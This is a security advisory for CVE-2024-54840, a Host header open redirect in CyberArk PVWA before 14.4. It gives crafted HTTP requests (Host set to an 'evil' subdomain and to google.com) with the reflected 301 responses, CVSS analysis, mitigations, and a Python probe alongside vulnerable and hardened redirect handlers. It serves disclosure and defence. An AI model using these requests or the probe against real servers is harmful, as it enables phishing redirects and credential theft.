Last active: March 17, 2025 12:40

# Host Header Manipulation Leading to Open Redirect in CyberArk Privileged Access Manager Self-Hosted (PVWA) - CVE-2024-54840
## Summary

A vulnerability in **CyberArk Privileged Access Manager Self-Hosted (PVWA)** allows an **Open Redirect**: the absolute URL in the server's 301 redirect is built from the request's `Host` header. An unauthenticated, remote attacker who can get a request with a crafted `Host` header to the server obtains a redirect to a domain under their control (or to any arbitrary domain). CyberArk attributes the issue to environment-related misconfigurations that can contribute to Host header injection.

---

## Affected Products and Versions

- **Product:** CyberArk Privileged Access Manager Self-Hosted (PVWA)
- **Versions Affected:** Versions **before 14.4**

According to CyberArk's [release notes](https://docs.cyberark.com/pam-self-hosted/latest/en/content/release%20notes/rn-whatsnew14-4.htm#Securitybugfixes), PVWA 14.4 addresses environment issues that can contribute to Host header injection; earlier versions do not.

---
## Technical Details and Reproduction Steps

### 1. Normal Redirection Flow (Example)

**Legitimate Request:**

```http
GET /PasswordVault/auth? HTTP/1.1
Host: 10.XXX.XXX.XXX
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Cache-Control: max-age=0
```

**Server Response (301 Moved Permanently):**

```http
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: https://10.XXX.XXX.XXX/PasswordVault/auth/?
Content-Security-Policy: frame-ancestors 'self';
Strict-Transport-Security: max-age=31536000;includeSubdomains;
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Access-Control-Expose-Headers: Warning
Date: Wed, 12 Feb 2025 08:00:13 GMT
Connection: close
Content-Length: 164

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>
This document may be found <a HREF="https://10.XXX.XXX.XXX/PasswordVault/auth/?">here</a></body>
```

The user is redirected to the legitimate host (`10.XXX.XXX.XXX`). This is the web server's trailing-slash ("courtesy") redirect: `/PasswordVault/auth` is a directory, so the request is answered with a 301 to the same path plus `/`, and the absolute `Location` is assembled from the `Host` header of the incoming request rather than from a configured site name. The `Object Moved` body is the standard IIS page for that redirect.

---
### 2. Exploitation via Manipulated `Host` Header (Evil Subdomain)

**Malicious Request:**

```http
GET /PasswordVault/auth? HTTP/1.1
Host: evil.10.XXX.XXX.XXX
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Cache-Control: max-age=0
```

**Server Response (301 Moved Permanently):**

```http
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: https://evil.10.XXX.XXX.XXX/PasswordVault/auth/?
Content-Security-Policy: frame-ancestors 'self';
Strict-Transport-Security: max-age=31536000;includeSubdomains;
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Access-Control-Expose-Headers: Warning
Date: Wed, 12 Feb 2025 08:03:19 GMT
Connection: close
Content-Length: 169

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>
This document may be found <a HREF="https://evil.10.XXX.XXX.XXX/PasswordVault/auth/?">here</a></body>
```

**Outcome:** The attacker-supplied host name is copied verbatim into `Location` and into the HTML body, so the user is redirected to a domain controlled by the attacker (e.g., `evil.10.XXX.XXX.XXX`). No authentication is involved: the request is answered before the login page is reached.

---
### 3. Additional PoC Example (Redirecting to `google.com`)

The vulnerability allows **any** arbitrary domain to be used in the `Host` header, not only a subdomain of the legitimate host, as demonstrated here:

**Malicious Request Redirecting to google.com:**

```http
GET /PasswordVault/v10? HTTP/1.1
Host: google.com
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Cache-Control: max-age=0
```

**Server Response (301 Moved Permanently):**

```http
HTTP/1.1 301 Moved Permanently
...
Location: https://google.com/PasswordVault/v10/?
...
```

The server blindly appends `/PasswordVault/v10/?` to the host name taken from the `Host` header, demonstrating how trivial it is to redirect a user to any domain. That a request carrying `Host: google.com` still reaches the PVWA site at all also indicates that the site accepts any host name (no host-name-specific binding), which is consistent with the environment-related cause CyberArk describes.

---
## Security Impact

1. **Confidentiality:**
   - Attackers can redirect victims to a malicious site that imitates the PVWA login page and captures the credentials entered there. Cookies and session tokens bound to the legitimate origin are not sent to the attacker's host by the redirect itself; the loss comes from what the user subsequently submits.
2. **Integrity:**
   - In an advanced phishing scenario, attackers could impersonate the legitimate site, leading users to submit data or perform actions that modify critical information.
3. **Availability:**
   - Not directly affected, as the legitimate service remains available.

---
## Proposed CVSS and Justification

**Current Assigned Vector (Example)**

```
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N => 4.2 (Medium)
```

**Proposed Updated Vector**

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N => 6.1 (Medium)
```

Note that CVSS v3.1 has no "Medium" level for Confidentiality or Integrity (the valid values are None, Low and High), so a vector written as `C:M/I:M` is not valid and no calculator will score it. The 6.1 that the proposal aims for is the usual score for an open redirect (CWE-601): the vulnerable component is only the redirect, but the harm lands on the user's browser and on whatever site the user is sent to, which is why Scope is rated Changed. With a valid vector the score is deterministic; it does not depend on the calculator used.

### Why AC:L (Attack Complexity: Low)?

- Exploitation merely involves sending an HTTP request with a manipulated `Host` header; no special server-side conditions or rare configurations are required.
- Any attacker with network access can reproduce it using simple tools like `curl` or Burp Suite.
- One caveat a reviewer will raise: a victim's browser sets its own `Host` header, so turning the reflected redirect into an attack on a user requires a delivery step under the attacker's control (for example an intermediary or cache that forwards the attacker's host value). That delivery step is the usual argument for AC:H; the server-side behaviour itself is trivial to trigger.

### Why S:C with C:L and I:L?

- By redirecting victims to a controlled domain that mimics the legitimate one, attackers can steal credentials and induce users to submit data to the wrong site. The confidentiality and integrity loss is limited (Low) and is suffered by the user and the destination site rather than by the PVWA component itself, hence the scope change.

---
## Possible Mitigations

- **Upgrade to PVWA 14.4 or later**, which CyberArk lists as addressing the environment issues behind Host header injection.
- **Validate the `Host` header** on the server side, ensuring redirections only point to legitimate, configured domains; reject requests whose `Host` is not expected rather than serving them.
- **Build redirect URLs from a configured canonical host name** instead of echoing the request's `Host`.
- **Disable Host-based redirections** if they are not required.
- **Use a whitelist of allowed domains** for redirections.
- **Tighten the IIS binding:** bind the PVWA site to its explicit host name(s) instead of a wildcard binding, and where a catch-all binding is unavoidable, drop requests with an unexpected `{HTTP_HOST}` (for example with a URL Rewrite rule whose action is `AbortRequest`).
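The redirect behaviour exercised by the three requests above, and the validation the mitigations describe, as an added example that is not CyberArk's code nor the reporter's: a minimal model of a trailing-slash redirect that trusts `Host`, a hardened variant that checks `Host` against an allowlist and always builds `Location` from a configured canonical host, and a probe that sends the manipulated request and reports whether the injected host is reflected. The host names `pvwa.example.com` and `10.0.0.10`, the allowlist, and the loopback servers are constructed for this example.

```python
"""Added example (not CyberArk's or the reporter's code): a model of the
Host-trusting trailing-slash redirect, a hardened variant, and a probe.

Hypothetical values: pvwa.example.com and 10.0.0.10 are the constructed
legitimate host names; the servers run on loopback for the demo only."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"pvwa.example.com", "10.0.0.10"}  # constructed allowlist
CANONICAL_HOST = "pvwa.example.com"                # host used in every Location


def redirect_target(path, host):
    """Absolute URL of the directory redirect: the path gains a trailing slash
    and the query string is preserved (/PasswordVault/auth? -> .../auth/?)."""
    route, _, query = path.partition("?")
    return f"https://{host}{route.rstrip('/')}/?{query}"


class VulnerableRedirect(BaseHTTPRequestHandler):
    """Builds Location from whatever Host the client sent (the reported behaviour)."""

    def do_GET(self):
        self.redirect(redirect_target(self.path, self.headers.get("Host", "")))

    def redirect(self, location):
        self.send_response(301)
        self.send_header("Location", location)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


class HardenedRedirect(VulnerableRedirect):
    """Rejects unknown Host values and never copies Host into Location."""

    def do_GET(self):
        # Strip a :port suffix (IPv6 literals would need bracket-aware parsing).
        host = self.headers.get("Host", "").split(":")[0].lower()
        if host not in ALLOWED_HOSTS:
            self.send_response(400)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        self.redirect(redirect_target(self.path, CANONICAL_HOST))


def start_server(handler):
    """Serve `handler` on an ephemeral loopback port in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(port, injected_host, path="/PasswordVault/auth?"):
    """Send the manipulated request; return (status, Location, reflected?)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.putrequest("GET", path, skip_host=True)  # we set Host ourselves
    conn.putheader("Host", injected_host)
    conn.endheaders()
    resp = conn.getresponse()
    location = resp.getheader("Location") or ""
    conn.close()
    reflected = urlsplit(location).hostname == injected_host.lower()
    return resp.status, location, reflected


def demo():
    """Probe both handlers with the three Host values used in the advisory."""
    results = {}
    for name, handler in (("vulnerable", VulnerableRedirect), ("hardened", HardenedRedirect)):
        server = start_server(handler)
        try:
            results[name] = {
                "legit": probe(server.server_port, "10.0.0.10"),
                "evil_subdomain": probe(server.server_port, "evil.10.0.0.10"),
                "google": probe(server.server_port, "google.com", "/PasswordVault/v10?"),
            }
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for name, cases in demo().items():
        for case, (status, location, reflected) in cases.items():
            print(f"{name:10s} {case:15s} {status} {location!r} reflected={reflected}")
```

Against a real target, `probe` would be pointed at the PVWA host and port (over TLS) rather than at the loopback servers; the `reflected` flag is the check to automate, since a `Location` whose host name equals the injected value is exactly what the advisory shows. The hardened handler answers unknown hosts with 400 instead of guessing, which is the same effect an explicit IIS host binding or an `AbortRequest` rewrite rule gives at the web-server layer.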
---
## Credits

- **Discovered by:** Abel Iglesias Iglesias, Senior Consultant at Grupo SIA, an Indra company
- **Discovery Date:** June 2024

---

## References

- [CyberArk Official Documentation - Release Notes 14.4 (Security bug fixes)](https://docs.cyberark.com/pam-self-hosted/latest/en/content/release%20notes/rn-whatsnew14-4.htm#Securitybugfixes)

---